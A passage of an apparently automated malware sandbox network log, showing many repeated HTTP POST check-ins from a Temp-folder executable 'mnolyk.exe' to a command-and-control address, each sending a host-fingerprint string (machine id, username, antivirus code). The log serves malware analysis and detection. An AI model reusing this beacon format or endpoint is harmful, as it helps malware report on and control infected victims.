                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.469439030 CET | 771 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      657 | 192.168.2.7 | 50352 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:57.641139030 CET | 772 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.704109907 CET | 772 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      658 | 192.168.2.7 | 50353 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:57.891552925 CET | 773 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.953656912 CET | 773 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      659 | 192.168.2.7 | 50354 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:58.136933088 CET | 774 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.203717947 CET | 774 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      66 | 192.168.2.7 | 49761 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:17.550184011 CET | 181 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.615426064 CET | 181 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      660 | 192.168.2.7 | 50355 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:58.376240015 CET | 775 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.441500902 CET | 775 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      661 | 192.168.2.7 | 50356 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:58.629045010 CET | 776 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.693655014 CET | 776 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      662 | 192.168.2.7 | 50357 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:58.872293949 CET | 777 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.936474085 CET | 777 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      663 | 192.168.2.7 | 50358 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:59.107326031 CET | 778 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.172822952 CET | 778 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      664 | 192.168.2.7 | 50359 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:59.354060888 CET | 779 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.417911053 CET | 779 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      665 | 192.168.2.7 | 50360 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:59.589637995 CET | 780 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.652297020 CET | 780 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      666 | 192.168.2.7 | 50361 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:59.837622881 CET | 781 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.900100946 CET | 781 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      667 | 192.168.2.7 | 50362 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:00.086375952 CET | 782 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.150013924 CET | 782 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      668 | 192.168.2.7 | 50363 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:00.334134102 CET | 783 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.398782969 CET | 783 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      669 | 192.168.2.7 | 50364 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:00.578597069 CET | 784 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.642594099 CET | 784 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      67 | 192.168.2.7 | 49762 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:17.827369928 CET | 182 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.891773939 CET | 182 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      670 | 192.168.2.7 | 50365 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:00.817410946 CET | 785 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.882772923 CET | 785 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      671 | 192.168.2.7 | 50366 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:01.065649986 CET | 786 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.131680012 CET | 786 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      672 | 192.168.2.7 | 50367 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:01.324979067 CET | 787 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.387620926 CET | 787 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
